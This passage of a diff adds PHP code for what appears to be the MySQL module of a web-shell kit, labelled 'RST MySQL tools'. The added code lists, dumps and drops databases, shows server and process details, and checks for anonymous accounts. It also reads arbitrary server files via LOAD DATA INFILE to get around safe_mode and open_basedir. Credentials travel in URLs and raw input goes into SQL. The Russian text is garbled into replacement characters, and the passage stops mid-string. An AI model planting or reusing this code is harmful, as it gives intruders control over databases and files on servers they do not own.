+ $connection = mysql_connect($server.":".$port, $login, $passwd) or die("$header<table align=center width=80% bgcolor=red><tr><br>������ ���������� � MySQL �������� <b>$server</b><td><center><font size=2><b>".mysql_error()."</b></font></center><br><b>��������� ������:</b><li>�� ���������� ����� ������� <b>$server</b><li>�� ���������� ����� ����� <b>$port</b><li>�� ������ ��� (login) ����� mysql <b>$login</b><li>�� ������ ������ (password) ����� mysql <b>$passwd</b><li>������ � ������� $server �������� � ������ <b>".GETenv('REMOTE_ADDR')."</b><li>��������� ������ �������� �� ��������</td></tr></table><br></td></tr></table><script>alert('�� �������� ���������� ���������� � MySQL �������� $server \\n\\n ��������� ������������ �������� ������:\\n\\n������ $server\\n���� $port\\n��� $login\\n������ $passwd');</script><head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self'></head>");
+}
+
+
+/*---------------------- L E F T   B L O C K (menu bd)! -------------------*/
+/*�������� ��� ���� �������*/
+if ($connection&&!isset($db)) {
+   print "<table border=0 cellpadding=0 cellspacing=1 width=100% bgcolor=#FFFFFF><tr><td bgcolor=#B6B5B5 align=center>".
+           "<a href=\"$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"��������� � ������ � �������� ������ ���\"><font color=green><b>".
+           "��������&nbsp;���&nbsp;����</b></font></a></td></tr></table>";
+   
+   $result = mysql_list_dbs($connection) or die("$h_error<b>".mysql_error()."</b>$f_error");
+   while ( $row=mysql_fetch_row($result) ){
+       $cnt_title=mysql_num_rows(mysql_list_tables($row[0])); //���-�� ������ ����   
+       print "<table valign=top border=0 width=100% cellpadding=0 cellspacing=1 bgcolor=#FFFFFF><tr><td bgcolor=#DBDCDD>";
+       if ($cnt_title < 1) {
+         print "<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$row[0]&cr_tbl=new&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"����� ������ $cnt_title\"><b>$row[0]</b></a>";
+       }else{
+         print "<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$row[0]&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"����� ������ $cnt_title\"><b>$row[0]</b></a>";
+       }
+       print "</td></tr></table>";
+    }
+}
+
+// ������ ������ ���� ������
+if (isset($db)){          
+  $result=mysql_list_tables($db) or die ("$h_error<b>".mysql_error()."</b>$f_error<head><META HTTP-EQUIV='Refresh' CONTENT='5;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>");
+   print "<table border=0 cellpadding=0 cellspacing=1 width=100% bgcolor=#FFFFFF><tr><td bgcolor=#B6B5B5 align=center>".
+           "<a href=\"$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port\"><font color=green><b>".
+           "��������&nbsp;���&nbsp;����</b></font></a></td></tr><tr><td></td></tr><tr><td></td></tr></table>";
+
+  print "<table cellpadding=0 cellspacing=1 width=100% bgcolor=#FFFFFF><tr><td bgcolor=silver align=center>".
+        "---[ <a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db\" title=\"�������� ������ ������\"><b>$db</b></a>".
+        " ]---</a></td></tr><tr><td></td></tr><tr><td></td></tr></table>";
+
+  while ( $row=mysql_fetch_array($result) ){
+    //�������� ���������� �����(�������) � �������
+    $count=mysql_query ("SELECT COUNT(*) FROM $row[0]");
+    $count_row= mysql_fetch_array($count);
+    print "<table valign=top border=0 width=100% cellpadding=0 cellspacing=1 bgcolor=#FFFFFF>".
+          "<tr><td bgcolor=#DBDCDD>";
+    if ($count_row[0] < 1) { 
+       print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$row[0]&nn_row=ok\">$row[0]</a>&nbsp;($count_row[0])</td></tr></table>";  
+    }else{
+        print "<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&tbl=$row[0]&limit_start=0&limit_count=5\">$row[0]</a>&nbsp;($count_row[0])</td></tr></table>";  
+    }
+    @mysql_free_result($count);
+  }
+} 
+
+/*---------------------- END L E F T   B L O C K (menu bd)! -------------------*/
+
+print "
+   </td>
+   <td valign=top bgcolor=#E6E7E9>";
+
+/*------------------------ R I G H T   B L O C K ! -----------------------*/
+if ($connection&&!isset($db)) { 
+$anon = @mysql_query("SELECT Host,User FROM mysql.user WHERE User=''", $connection); 
+if (mysql_num_rows($anon)>0) { print "<table align=center><tr><td><b>��������!<b></td></tr><tr><td bgcolor=red>��������� ������������� ��������� ����������� � ������� MySQL</td></tr></table>"; }
+print $form_ad_b; 
+}
+/*-------------�������� MySql------------*/
+if (isset($proc) && $proc=="TRUE"){
+$result = mysql_query("SHOW PROCESSLIST", $connection); 
+ print "<center><font size=2>�������� MySQL ������� [ <b>$server</b> ]</font><center><table align=center border=0 cellpadding=0 cellspacing=1 width=80% bgcolor=#FFFFFF><tr align=center bgcolor=#B6B5B5><td>ID</td><td>USER</td><td>HOST</td><td>DB</td><td>COMMAND</td><td>TIME</td><td>STATE</td><td>INFO</td></tr>";
+ while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
+   print "<tr bgcolor=#DAD9D9><td>$row[0]</td><td>$row[1]</td><td>$row[2]</td><td>$row[3]</td><td>$row[4]</td><td>$row[5]</td><td>$row[6]</td><td>$row[7]</td></tr>";  
+ } 
+  print "</table><br>";
+ mysql_free_result($result);
+ unset($proc);
+}
+
+/*������� ����� ����*/
+if (isset($HTTP_GET_VARS['new_db'])){
+    $new_db=trim($HTTP_GET_VARS['new_db']);
+    if (mysql_create_db ($new_db)) {
+        print ("<center><font size=2>���� <b>$new_db</b> ������� �������</font></center><br>");
+        print "<head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>";
+    } else {
+        print "$h_error".mysql_error()."$f_error <head><META HTTP-EQUIV='Refresh' CONTENT='5;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>";
+    }
+    unset($new_db);
+}
+
+/*�������� ����*/
+if (isset($HTTP_GET_VARS['drop'])){
+     $result_d = mysql_list_dbs($connection) or die("<td bgcolor=#DAD9D9>$h_error".mysql_error()."$f_error</td></tr></table>");
+     while ( $row_d=mysql_fetch_row($result_d) ){
+        if ($drop==$row_d[0]) $dr="TRUE";
+     }
+ if ($dr="TRUE") { 
+ mysql_drop_db($drop,$connection);
+ print ("<center><font size=2>���� <b>$drop</b> ������� �������</font></center><br>");
+ print "<head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self?s=$s&login=$login&passwd=$passwd&server=$server&port=$port'></head>";
+ }
+unset($drop);
+}
+
+/*-------------������ ������������ ���� �������-----------*/
+if (isset($f)){
+print $form_file;
+}
+if(isset($p_file)){ 
+  mysql_create_db("tmp_bd") or die("$h_error<b>".mysql_error()."</b>$f_error");
+  mysql_select_db("tmp_bd") or die("$h_error<b>".mysql_error()."</b>$f_error"); 
+  mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );') or die("$h_error<b>".mysql_error()."</b>$f_error");
+  mysql_query("LOAD DATA INFILE \"".addslashes($p_file)."\" INTO TABLE tmp_file");
+ $query = "SELECT * FROM tmp_file";
+ $result = mysql_query($query) or die("$h_error<b>".mysql_error()."</b>$f_error");
+  /*�������� �������� ��������*/
+  for ($i=0;$i<mysql_num_fields($result);$i++){
+   $name=mysql_field_name($result,$i);
+  } 
+  print "<table align=center border=0 cellpadding=5 cellspacing=1 width=90% bgcolor=#FFFFFF><tr><td align=center bgcolor=#DBDCDD>$name</td></tr>
+        <tr><td background=".$self."?img=st_form_bg bgcolor=#ECEDEE>
+        <form method=\"GET\" action=\"$self?f=x_file\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">                
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        ������ ���� � �����: <input type=\"text\" name=\"p_file\" value=\"$p_file\" size=\"40\">&nbsp;&nbsp;&nbsp;&nbsp;
+        <input type=\"submit\" value=\"�������� ����\"></form>
+  ";
+  while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {
+      foreach ($line as $key =>$col_value) {          
+          print htmlspecialchars($col_value)."<br>";
+      }
+  }
+  mysql_free_result($result);
+  print "</td></tr></table><br>";
+  mysql_drop_db("tmp_bd") or die("$h_error<b>".mysql_error()."</b>$f_error");
+} 
+
+/*--------------���������� ������� Apache------------*/
+if (isset($apc) && $apc=="TRUE"){
+ print "<center><font size=2>���������� ������� Apache [ <b>$server</b> ]</font><center>
+ <table align=center border=0 cellpadding=0 cellspacing=1 width=80% bgcolor=#FFFFFF>
+  <tr align=center bgcolor=#B6B5B5>
+   <td>��������</td><td>����������</td>
+  </tr> 
+  <tr bgcolor=#DAD9D9><td>��� Internet-�����</td><td>".$HTTP_SERVER_VARS["SERVER_NAME"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>IP-����� �����</td><td>".$HTTP_SERVER_VARS["SERVER_ADDR"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>���� Web-�������.</td><td>".$HTTP_SERVER_VARS["SERVER_PORT"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>������������ CGI ���������.</td><td>".$HTTP_SERVER_VARS["GATEWAY_INTERFACE"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>�������� ��� ������� ������ �������� (�����).</td><td>".$HTTP_SERVER_VARS["REQUEST_METHOD"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>Root ���������� ��� ������� ������������.</td><td>".$HTTP_SERVER_VARS["DOCUMENT_ROOT"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>��������� �������� �������.</td><td>".$HTTP_SERVER_VARS["HTTP_CONNECTION"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>��������� httpd.conf (SERVER_ADMIN).</td><td>".$HTTP_SERVER_VARS["SERVER_ADMIN"]."</td></tr>
+  <tr bgcolor=#DAD9D9><td>��������� �������.</td><td>".$HTTP_SERVER_VARS["SERVER_SIGNATURE"]."</td></tr>
+ </table><br>";
+ unset($apc);
+}
+
+/*---------------���������� MySQL �������--------------*/
+if (isset($stat) && $stat=="TRUE"){
+$result = mysql_query("SHOW STATUS", $connection); 
+ print "<center><font size=2>���������� ��������� MySQL ������� [ <b>$server</b> ]</font><center><table align=center border=0 cellpadding=0 cellspacing=1 width=400 bgcolor=#FFFFFF><tr align=center bgcolor=#B6B5B5><td>���������� ��������� �������</td><td>�������� ����������</td></tr>";
+ while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
+   print "<tr bgcolor=#DAD9D9><td>$row[0]</td><td>$row[1]</td></tr>";  
+ } 
+  print "</table>";
+ mysql_free_result($result);
+}
+
+/*---------------��������� ���������� MySQL �������--------------*/
+if (isset($var) && $var=="TRUE"){
+$result = mysql_query("SHOW VARIABLES ", $connection); 
+ print "<center><font size=2>��������� ���������� MySQL ������� [ <b>$server</b> ]</font><center><table align=center border=0 cellpadding=0 cellspacing=1 width=80% bgcolor=#FFFFFF><tr align=center bgcolor=#B6B5B5><td>���������� �������</td><td>�������� ����������</td></tr>";
+ while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
+   print "<tr bgcolor=#DAD9D9><td>$row[0]</td><td>$row[1]</td></tr>";  
+ } 
+  print "</table>";
+ mysql_free_result($result);
+unset($var);
+}
+
+/*-------------����� ������ ������------------*/
+if (isset($db) && !isset($tbl)) {
+$cnt=mysql_num_rows(mysql_list_tables($db)); //���-�� ������ ����
+ print "<table border=0 align=center width=100% cellpadding=0 cellspacing=0>
+         <tr>
+           <td>
+                <table border=0 align=center width=80% cellpadding=0 cellspacing=1 bgcolor=#FFFFFF>
+                   <tr align=center>                      
+                      <td width=20% bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&cr_tbl=new\" title=\"������� ����� ������� � ���� $db\"><b>������� �������</b></a>
+                      </td>
+                      <td width=20% bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$db&login=$login&passwd=$passwd&server=$server&port=$port&query_tbl&q_tbl=bd\" title=\"������������ ������ � ����\"><b>SQL-������</b></a>
+                      </td>
+                      <td width=20% bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$db&str=TRUE&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"�������� ��������� ��\"><b>���������</b></a>
+                      </td>
+                      <td width=20% bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&login=$login&passwd=$passwd&server=$server&port=$port&db=$db&dump=bd\" title=\"������� ������ ���� $db\"><b>���� ����</b></a>
+                      </td>
+                      <td width=20% bgcolor=#B6B5B5>
+<a href=\"$_SERVER[PHP_SELF]?s=$s&drop=$db&login=$login&passwd=$passwd&server=$server&port=$port\" title=\"������� �� $db\" onClick=\"return confirm('������� ���� $db ?')\";><b>������� ����</b></a>
+                     </td>
+                   </tr> 
+                </table> 
+           </td>
+         </tr>
+         <tr>
+           <td><br>";
+               print "&nbsp;&nbsp;��:(<b>$db</b>)  &nbsp;&nbsp;����� ������:(<b>$cnt</b>)";
+               if (isset($t)) { print "<br>&nbsp;&nbsp;".base64_decode($t);}
+               if (isset($t2)) { print base64_decode($t2);}
+/*-------------��������� ���� ------------------*/
+if (isset($str) && $str=='TRUE'){
+  mysql_select_db($db);
+  if ($cnt < 1) { 
+      print "<table border=1 width=400 align=center bgcolor=#E7E7D7><tr align=center>".
+            "<td><br><h5>���������� �������� ��������� ����<br>� ���� <font color=blue>".
+            "$db</font> ��� ������!</h5></td></tr></table><br><br>";     
+  }else{
+    $result = mysql_query("SHOW TABLE STATUS", $connection); 
+    print "<br><center><font size=2>��������� ���� [ <b>$db</b> ]</font></center>".
+          "<table align=center border=0 cellpadding=0 cellspacing=1 width=650 bgcolor=#FFFFFF>".
+          "<tr align=center bgcolor=#B6B5B5><td>��� �������</td><td>���</td><td>�����</td><td>�������</td>".
+          "<td>��������������</td><td>������(kb)</td><td>��������</td></tr>";
+    while ($row = mysql_fetch_array($result, MYSQL_NUM)) {
+      $size=$row[5]/1000;
+      print "<tr bgcolor=#DAD9D9><td>$row[0]</td><td>$row[1]</td><td align=center>$row[3]</td>".
+            "<td>$row[10]</td><td>$row[11]</td><td align=center>$size</td><td bgcolor=red align=center>".
+            "<a href=\"$_SERVER[PHP_SELF]?s=$s&db=$db&login=$login&passwd=$passwd&server=$server&".
+            "port=$port&drop_table=$row[0]\" onClick=\"return confirm('������� ������� $row[0]?')\";>����������</a></td>
+            </tr>";  
+    } 
+    print "</table><br>";
+    mysql_free_result($result);
+  }
+} 
+
+print "    </td>
+         </tr>
+       </table>";
+}
+
+/*------------���� ����----------------*/
+$form_dump_bd=
+"<form method=\"GET\" action=\"$self\">".
+"<input type=\"hidden\" name=\"s\" value=\"$s\">".
+"<input type=\"hidden\" name=\"db\" value=\"$db\">".
+"<input type=\"hidden\" name=\"server\" value=\"$server\">".
+"<input type=\"hidden\" name=\"port\" value=\"$port\">".
+"<input type=\"hidden\" name=\"login\" value=\"$login\">".
+"<input type=\"hidden\" name=\"passwd\" value=\"$passwd\">".
+"<input type=\"hidden\" name=\"f_dump\" value=\"$file\">".
+"<input type=\"hidden\" name=\"dump\" value=\"bd\">".
+"<input type=\"hidden\" name=\"strukt\" value=\"d_strukt_bd\">".
+"<table align=center bgcolor=#FFFFFF width=400 cellpadding=0 cellspacing=1 border=0><tr bgcolor=#F0F1F4><td valign=top>".
+"<table cellpadding=2 bgcolor=#F0F1F4 width=100%>".
+"<tr><td align=center><b>Dump ����</b> [ <font color=green><b>$db</b></font> ]</td></tr>".
+"<tr><td align=center><font color=gray><b>��������� � ������</b></font></td></tr>".
+"<tr><td align=center><hr size=1 color=#FFFFFF><b>��������</b> (��������/���������)</td></tr>".
+"<tr><td><input type=\"radio\" name=\"send\" value=\"send_br\" checked=\"checked\"> �������� � ��������</td></tr>".
+"<tr><td><input type=\"radio\" name=\"send\" value=\"send_http\"> ��������� ���� ����� �� HTTP</td></tr>".
+"<tr><td align=center><br><input type=\"submit\" value=\"��������� ������\"></td></tr>".
+"</table>".
+"</td></tr></table></form>";
+
+if ($HTTP_GET_VARS['dump']=='bd') {
+   if ($cnt >= 1) {
+      print $form_dump_bd;
+   }else{ 
+      print "<table border=1 width=400 align=center bgcolor=#E7E7D7><tr align=center>".
+            "<td><br><h5>���������� ������� ���� ����<br>� ���� <font color=blue>".
+            "$db</font> ��� ������!</h5></td></tr></table><br><br>";
+   }
+}
+   $host = $HTTP_SERVER_VARS["SERVER_NAME"];
+   $ip = $HTTP_SERVER_VARS["SERVER_ADDR"];
+if ($HTTP_GET_VARS['strukt']=='d_strukt_bd' && $HTTP_GET_VARS['send']=='send_br'){
+   if (sizeof($tabs) == 0) { 
+      // �������� ������ ������ ���� 
+      $res = mysql_query("SHOW TABLES FROM $db", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_row($res)) { 
+            $tabs[] .= $row[0]; 
+         } 
+      } 
+   } 
+       // ��������� ���� ��� ������ ����� 
+   $fp = fopen($file, "w"); 
+   fputs ($fp, "# RST MySQL tools\n# Home page: http://rst.void.ru\n#\n# Host settings:\n# MySQL version: (".mysql_GET_server_info().")\n# Date: ".
+   date("F j, Y, g:i a")."\n# ".$host." (".$ip.")"." dump db \"".$db."\"\n#____________________________________________________________\n\n"); 
+   foreach($tabs as $tab) {       
+      if ($add_drop) { 
+         fputs($fp, "DROP TABLE IF EXISTS `".$tab."`;\n");
+      }        
+      // �������� ����� ������� �������� ��������� ������� 
+      $res = mysql_query("SHOW CREATE TABLE `".$tab."`", $connection) or die(mysql_error()); 
+      $row = mysql_fetch_row($res); 
+      fputs($fp, $row[1].";\n\n"); 
+       
+      // �������� ������ ������� 
+      $res = mysql_query("SELECT * FROM `$tab`", $connection); 
+      if (mysql_num_rows($res) > 0) { 
+         while ($row = mysql_fetch_assoc($res)) { 
+            $keys = implode("`, `", array_keys($row)); 
+            $values = array_values($row); 
+            foreach($values as $k=>$v) {$values[$k] = addslashes($v);} 
+            $values = implode("', '", $values); 
+            $sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n"; 
+            fputs($fp, $sql); 
+         } 
+      } 
+      fputs ($fp, "#---------------------------------------------------------------------------------\n\n"); 
+   } 
+   fclose($fp);
+   $dump_file=file($file);
+   print "<table border=1 align=center cellpadding=2 bgcolor=#F0F1F4 width=98%><tr><td>";
+   print "<table border=0 align=center cellpadding=2 bgcolor=#F0F1F4>";
+   foreach ($dump_file as $k=>$v) {
+        $v=str_replace("\n","<br>",$v);
+        print "<tr><td>".strip_tags($v,"<br>")."</td></tr>";
+   }
+   print "</table></td></tr></table><br>";
+   unlink($file);
+} 
+
+/*--------------������� ����� �������---------------*/
+ $form_cr_tbl=
+ "<form method=\"GET\" action=\"$self\">".
+ "<input type=\"hidden\" name=\"s\" value=\"$s\">".
+ "<input type=\"hidden\" name=\"db\" value=\"$db\">".
+ "<input type=\"hidden\" name=\"server\" value=\"$server\">".
+ "<input type=\"hidden\" name=\"port\" value=\"$port\">".
+ "<input type=\"hidden\" name=\"login\" value=\"$login\">".
+ "<input type=\"hidden\" name=\"passwd\" value=\"$passwd\">".
+ "<table align=center bgcolor=#FFFFFF width=400 cellpadding=0 cellspacing=1 border=0><tr bgcolor=#F0F1F4><td valign=top>".
+ "<table cellpadding=2 bgcolor=#F0F1F4 width=100%>".
+ "<tr><td align=center><b>������� ����� ������� � ����</b> [ <font color=green><b>$db</b></font> ]<hr color=#FFFFFF></td></tr>".
+ "<tr><td align=center>��� ����� �������: <input type=\"text\" name=\"new_tbl_name\" value=\"\" size=25></td></tr>".
+ "<tr><td align=center>���������� ����� �������:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type=\"text\" name=\"new_count_cols\" value=\"\" size=10></td></tr>".
+ "<tr><td align=center><br><input type=\"submit\" value=\"��������� ������\"></td></tr>".
+ "</table>".
+ "</td></tr></table></form>";
+
+
+if (isset($HTTP_GET_VARS['cr_tbl']) && $HTTP_GET_VARS['cr_tbl']=='new'){
+  print "$form_cr_tbl";   
+}
+if ( (isset($new_count_cols)) && (ereg("[^0-9]",$new_count_cols) || preg_match("/ +/",$new_count_cols) || $new_count_cols=='') ) { 
+    print "<script>alert('���������� ����� ������� - ��� �����, � �� ���-�� ����!');</script>";
+    print "$form_cr_tbl";   
+}  
+
+if ( (ereg("[0-9]",$HTTP_GET_VARS['new_count_cols'])) && ($HTTP_GET_VARS['new_tbl_name'] !=='') ) {
+
+ for ($i=0; $i < $HTTP_GET_VARS['new_count_cols']; $i++) {
+
+  $pole_count .= "<tr align=center bgcolor=#DDDDDD>".
+      "<td><input type=\"text\" name=\"field_name[]\" size=\"10\" value=\"\"></td>".
+      "<td>
+            <select name=\"field_type[]\" width=3>
+                <option value=\"VARCHAR\">VARCHAR</option>
+                <option value=\"TINYINT\">TINYINT</option>
+                <option value=\"TEXT\">TEXT</option>
+                <option value=\"DATE\">DATE</option>
+                <option value=\"SMALLINT\">SMALLINT</option>
+                <option value=\"MEDIUMINT\">MEDIUMINT</option>
+                <option value=\"INT\">INT</option>
+                <option value=\"BIGINT\">BIGINT</option>
+                <option value=\"FLOAT\">FLOAT</option>
+                <option value=\"DOUBLE\">DOUBLE</option>
+                <option value=\"DECIMAL\">DECIMAL</option>
+                <option value=\"DATETIME\">DATETIME</option>
+                <option value=\"TIMESTAMP\">TIMESTAMP</option>
+                <option value=\"TIME\">TIME</option>
+                <option value=\"YEAR\">YEAR</option>
+                <option value=\"CHAR\">CHAR</option>
+                <option value=\"TINYBLOB\">TINYBLOB</option>
+                <option value=\"TINYTEXT\">TINYTEXT</option>
+                <option value=\"BLOB\">BLOB</option>
+                <option value=\"MEDIUMBLOB\">MEDIUMBLOB</option>
+                <option value=\"MEDIUMTEXT\">MEDIUMTEXT</option>
+                <option value=\"LONGBLOB\">LONGBLOB</option>
+                <option value=\"LONGTEXT\">LONGTEXT</option>
+                <option value=\"ENUM\">ENUM</option>
+                <option value=\"SET\">SET</option>
+            </select>
+        </td>".
+      "<td><input type=\"text\" name=\"field_length[]\" size=\"6\" value=\"\"></td>".
+      "<td>
+            <select name=\"field_attribute[]\">    
+                <option value=\"\" selected=\"selected\"></option>
+                <option value=\"BINARY\">BINARY</option>
+                <option value=\"UNSIGNED\">UNSIGNED</option>
+                <option value=\"UNSIGNED ZEROFILL\">UNS-D ZEROFILL</option>
+            </select>
+      </td>".
+      "<td>
+            <select name=\"field_null[]\">   
+                <option value=\"NOT NULL\">not null</option>
+                <option value=\"\">null</option>
+            </select>
+       </td>".
+       "<td><input type=\"text\" name=\"field_default[]\" size=\"14\" value=\"\"></td>".
+       "<td>
+            <select name=\"field_extra[]\">
+                <option value=\"\"></option>
+                <option value=\"AUTO_INCREMENT\">auto_increment</option>
+             </select>
+        </td>".
+        "<td align=\"center\"><input type=\"radio\" name=\"field_key_0[$i]\" value=\"primary_0\"></td>".
+        "<td align=\"center\"><input type=\"radio\" name=\"field_key_0[$i]\" value=\"index_0\"></td>".
+        "<td align=\"center\"><input type=\"radio\" name=\"field_key_0[$i]\" value=\"unique_0\"></td>".
+        "<td align=\"center\"><input type=\"radio\" name=\"field_key_0[$i]\" value=\"no\" checked=\"checked\"></td>".
+      "</tr>";
+ }
+
+  print 
+     "<form method=\"GET\" action=\"$self\">".
+     "<input type=\"hidden\" name=\"s\" value=\"$s\">".
+     "<input type=\"hidden\" name=\"db\" value=\"$db\">".
+     "<input type=\"hidden\" name=\"new_tbl_name\" value=\"$new_tbl_name\">".
+     "<input type=\"hidden\" name=\"server\" value=\"$server\">".
+     "<input type=\"hidden\" name=\"port\" value=\"$port\">".
+     "<input type=\"hidden\" name=\"login\" value=\"$login\">".
+     "<input type=\"hidden\" name=\"passwd\" value=\"$passwd\">".
+     "<table align=center bgcolor=#FFFFFF width=98% cellpadding=0 cellspacing=1 border=0><tr bgcolor=#F0F1F4><td valign=top>".
+     "<table cellpadding=2 bgcolor=#F0F1F4 width=100%>".
+     "<tr><td align=center><b>������� ����� �������</b> [ <font color=green><b>$new_tbl_name</b></font> ] <b>� ����</b> [ <font color=green><b>$db</b></font> ]<hr color=#FFFFFF></td></tr>".
+     "<tr><td align=center>".
+     "<table bgcolor=#000000 border=0 cellspacing=1 cellpadding=2 bgcolor=#F0F1F4 width=100%>".
+     "<tr align=center bgcolor=silver><td><b>����</b></td><td><b>���</b></td><td><b>������</b></td><td><b>��������</b></td><td><b>����</b></td><td><b>�� ���������</b></td><td><b>�������������</b></td><td><b>���������</b></td><td><b>������</b></td><td><b>����-o�</b></td><td><b>---</b></td></tr>";
+
+
+            print $pole_count;
+
+
+print
+    "</table><br><b>���������� � �������:</b> <input type=\"text\" name=\"comment\" size=\"40\" maxlength=\"80\">
+     &nbsp;&nbsp;&nbsp;&nbsp;<b>��� �������:</b>
+            <select name=\"tbl_type\">
+                <option value=\"Default\">�� ���������</option>
+                <option value=\"MYISAM\">MyISAM</option>
+                <option value=\"HEAP\">Heap</option>
+                <option value=\"MERGE\">Merge</option>
+                <option value=\"ISAM\">ISAM</option>
+            </select>&nbsp;&nbsp;&nbsp;&nbsp;
+           <input type=\"checkbox\" name=\"php_kod\" value=\"ok\"> �������� PHP-��� �������
+    </td></tr>".
+    "<tr><td align=center><br><input type=\"submit\" value=\"��������� ������\"></td></tr>".
+    "</table>".
+    "</td></tr></table></form>";
+}
+
+if (isset($HTTP_GET_VARS['field_name'])) {
+
+    for ($i=0; $i<count($field_name); $i++) {
+       if ($HTTP_GET_VARS['field_name'][$i] !=='') {
+         $n_name .= "`$field_name[$i]` ";
+         if ($HTTP_GET_VARS['field_length'][$i] !=='') {
+             $n_name .= "$field_type[$i]($field_length[$i]) ";
+         }else{
+             $n_name .= "$field_type[$i] ";
+         }
+         if ($HTTP_GET_VARS['field_attribute'][$i] !=='') { $n_name .= "$field_attribute[$i] "; }
+         if ($HTTP_GET_VARS['field_null'][$i] =='NOT NULL') { $n_name .= "$field_null[$i] "; }
+         if ($HTTP_GET_VARS['field_default'][$i] !=='') { $n_name .= "DEFAULT '$field_default[$i]' "; }
+         if ($HTTP_GET_VARS['field_extra'][$i] =='AUTO_INCREMENT') { $n_name .= "$field_extra[$i], "; }else{ $n_name .=', '; }
+
+         /*--------������� primary,index,unique----------*/
+         if ($HTTP_GET_VARS['field_key_0'][$i] !=='no') { 
+            if ($HTTP_GET_VARS['field_key_0'][$i] =='primary_0') {
+                $n_prim .= " `$field_name[$i]`, "; 
+            }
+            if ($HTTP_GET_VARS['field_key_0'][$i] =='index_0') { 
+                $n_ind .= " `$field_name[$i]`, "; 
+            }
+            if ($HTTP_GET_VARS['field_key_0'][$i] =='unique_0') { 
+                $n_uniq .= " `$field_name[$i]`, "; 
+            }
+         }
+         /*--------END primary,index,unique----------*/
+       }
+    }  //end for
+
+    $n_name=substr_replace($n_name,"",-2);                     
+    if (count($n_prim)>0) {
+       $n_prim=substr_replace($n_prim,"",-2); 
+       $n_name .=", PRIMARY KEY ($n_prim)";
+    }
+    if (count($n_ind)) {
+       $n_ind=substr_replace($n_ind,"",-2); 
+       $n_name .=", INDEX ($n_ind)";
+    }
+    if (count($n_uniq)) {
+       $n_uniq=substr_replace($n_uniq,"",-2); 
+       $n_name .=", UNIQUE ($n_uniq)";
+    }
+
+   $sql_new_tbl = "CREATE TABLE `$new_tbl_name` ( $n_name )";
+
+   if ($HTTP_GET_VARS['tbl_type'] !=='Default') {
+      $sql_new_tbl .= " TYPE =$tbl_type";
+   }
+   if ($HTTP_GET_VARS['comment'] !=='') {
+     $sql_new_tbl .= " COMMENT = '$comment'";
+   }       
+
+  $r_n_tbl=mysql_db_query($db, $sql_new_tbl) or die("$h_error".mysql_error()."$f_error");
+  $t=base64_encode("<font color=green size=2><b>Action: </b></font><font color=#706D6D size=2>������� [ <b>$new_tbl_name</b> ] ������� �������.</font><br>");
+   if ($HTTP_GET_VARS['php_kod']=='ok') { 
+        $t2=base64_encode("<br><table bgcolor=#EDEEF1 align=center width=98%><font color=green><b>PHP-��� �������:</b></font><tr><td>\$sql='$sql_new_tbl';</td></tr></table><br><br>");
+   }else{ $t2=''; }
+  print "<head><META HTTP-EQUIV='Refresh' CONTENT='0;url=$self?s=$s&db=$db&login=$login&passwd=$passwd&server=$server&port=$port&t=$t&t2=$t2'></head>";
+} 
+
+/*--------------END c������ ����� �������---------------*/
+
+/*-------------������������ ������ � ��-------------*/
+if ($HTTP_GET_VARS['q_tbl']=='bd') { $q_bd="SHOW TABLE STATUS "; }
+if ($HTTP_GET_VARS['return_sql']=='ok') { $q_bd=trim($HTTP_GET_VARS['new_query_bd']);}
+$form_query_db="<br>
+        <form method=\"GET\" action=\"$self?s=$s\">
+        <input type=\"hidden\" name=\"s\" value=\"$s\">                
+        <input type=\"hidden\" name=\"db\" value=\"$db\">
+        <input type=\"hidden\" name=\"server\" value=\"$server\">
+        <input type=\"hidden\" name=\"port\" value=\"$port\">
+        <input type=\"hidden\" name=\"login\" value=\"$login\">
+        <input type=\"hidden\" name=\"passwd\" value=\"$passwd\">
+        <table align=center width=90% border=0 bgcolor=#EDEEF1><tr><td>��������� ������������ ������ � ���� ( <b>$db</b> )</td></tr>
+        <tr><td width=90>
